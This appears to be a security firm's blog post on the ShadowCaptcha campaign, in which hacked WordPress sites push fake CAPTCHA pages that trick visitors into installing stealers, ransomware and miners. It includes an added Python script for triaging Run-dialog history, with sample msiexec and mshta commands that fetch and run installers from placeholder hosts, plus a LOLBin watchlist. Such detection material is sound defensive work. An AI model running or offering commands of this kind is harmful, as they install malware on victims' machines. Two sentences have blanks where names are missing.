ShadowCaptcha Campaign Unleashes Malware Through Compromised WordPress Sites

Updated: Sep 16

A sophisticated cyber campaign, dubbed ShadowCaptcha, is actively exploiting over 100 compromised WordPress websites. This campaign redirects unsuspecting visitors to deceptive CAPTCHA verification pages, employing social engineering tactics to distribute a dangerous mix of malware, including information stealers, ransomware, and cryptocurrency miners. The operation, first identified in August 2025, highlights the evolving nature of cyber threats targeting widely used web platforms.

Key Takeaways

  • ShadowCaptcha leverages fake CAPTCHA pages and social engineering to deliver malware.

  • The campaign targets WordPress sites, impacting users globally.

  • Malware payloads include information stealers, ransomware, and crypto miners.

  • Attackers use techniques like living-off-the-land binaries (LOLBins) and DLL side-loading.

  • Compromised sites are prevalent in Australia, Brazil, Italy, Canada, Colombia, and Israel.

ShadowCaptcha Campaign Details

The ShadowCaptcha campaign begins by injecting malicious JavaScript code into compromised WordPress sites. This code initiates a redirection chain, leading users to fake CAPTCHA pages designed to mimic legitimate services like Cloudflare or Google. The campaign utilizes a social engineering tactic known as ClickFix, which tricks users into executing malicious commands.

The attack chain bifurcates based on the instructions presented on the fake CAPTCHA page. One path involves the Windows Run dialog, leading to the deployment of Lumma and Rhadamanthys information stealers via MSI installers. The other path guides victims to save a page as an HTML Application (HTA) and execute it using , which can result in the installation of Epsilon Red ransomware.
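For the Run-dialog path described above, Explorer records every command a user executes through Win+R under the RunMRU registry key, which makes a quick triage check possible on a suspected endpoint. The script below is an added example and is not code from the article or its sources; it parses a constructed .reg export of that key and flags entries that launch a LOLBin or fetch content from a URL. The watchlist and the sample entries are illustrative assumptions, not published indicators.

```python
"""Triage a RunMRU export for ClickFix-style Run-dialog commands.

Added example (not from the original article). Assumes the input is a .reg
text export of HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
"""
import re

# LOLBins worth reviewing when they appear in a Run-dialog history (illustrative list).
WATCHLIST = {"mshta", "powershell", "pwsh", "cmd", "msiexec", "curl",
             "certutil", "bitsadmin", "rundll32", "regsvr32", "wscript", "cscript"}

# Constructed sample export, not a real artifact. Explorer stores each entry as
# "<command>\1"; a .reg export escapes the backslash, hence "\\1".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="msiexec /i https://captcha-check.invalid/verify.msi /qn\\1"
"c"="calc\\1"
"d"="mshta https://cf-verify.invalid/verify.hta\\1"
"MRUList"="dbca"
'''

def parse_runmru(reg_text):
    """Return the Run-dialog commands, newest first, as MRUList orders them."""
    entries, order = {}, ""
    for key, raw in re.findall(r'^"(\w+)"="(.*)"$', reg_text, re.M):
        value = re.sub(r"\\(.)", r"\1", raw)  # undo .reg escaping of \ and "
        if key == "MRUList":
            order = value  # letters of the entries, most recent first
        else:
            entries[key] = value.removesuffix("\\1")
    return [entries[k] for k in (order or sorted(entries)) if k in entries]

def suspicious_reasons(command):
    """List why a Run-dialog command looks like ClickFix follow-through."""
    parts = command.split()
    if not parts:
        return []
    # Normalise the executable: drop quotes, directory, and .exe suffix.
    exe = parts[0].strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    reasons = []
    if exe in WATCHLIST:
        reasons.append(f"launches LOLBin {exe}")
    if re.search(r"https?://", command, re.I):
        reasons.append("fetches content from a URL")
    if re.search(r"-w(indowstyle)?\s+h(idden)?\b", command, re.I):
        reasons.append("hides its window")
    return reasons

def triage(reg_text):
    """Return [(command, reasons)] for flagged entries, newest first."""
    return [(c, r) for c in parse_runmru(reg_text) if (r := suspicious_reasons(c))]
```

Benign entries such as `notepad` pass through silently, while the constructed `msiexec` and `mshta` entries are reported with the reasons that triggered them.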

Malware and Techniques Employed

Researchers have noted the use of advanced techniques within the ShadowCaptcha campaign. These include anti-debugger measures to hinder analysis and DLL side-loading to disguise malicious code execution as legitimate processes. Some variants of the campaign have also been observed distributing an XMRig-based cryptocurrency miner, with configurations fetched from Pastebin for dynamic adjustments.

In instances where cryptocurrency miners are deployed, attackers have been known to drop a vulnerable driver, , to gain kernel-level access. This allows for direct interaction with CPU registers, aiming to boost mining efficiency. The campaign's reach extends across various sectors, including technology, hospitality, legal/finance, healthcare, and real estate.

WordPress Site Compromise and Mitigation

While the exact method of WordPress site compromise remains unclear, security experts suggest that attackers likely exploit known vulnerabilities in plugins or gain access through compromised administrator credentials. The affected WordPress sites are predominantly located in Australia, Brazil, Italy, Canada, Colombia, and Israel.

To combat the threat posed by ShadowCaptcha, users are advised to be vigilant against ClickFix campaigns. Essential security practices include network segmentation to prevent lateral movement, keeping WordPress sites updated with the latest security patches, and implementing multi-factor authentication (MFA) for enhanced protection. The campaign underscores the need for robust security measures and user awareness in the face of evolving cyber threats.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, LinkedIn.

  • ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners, The Hacker News.
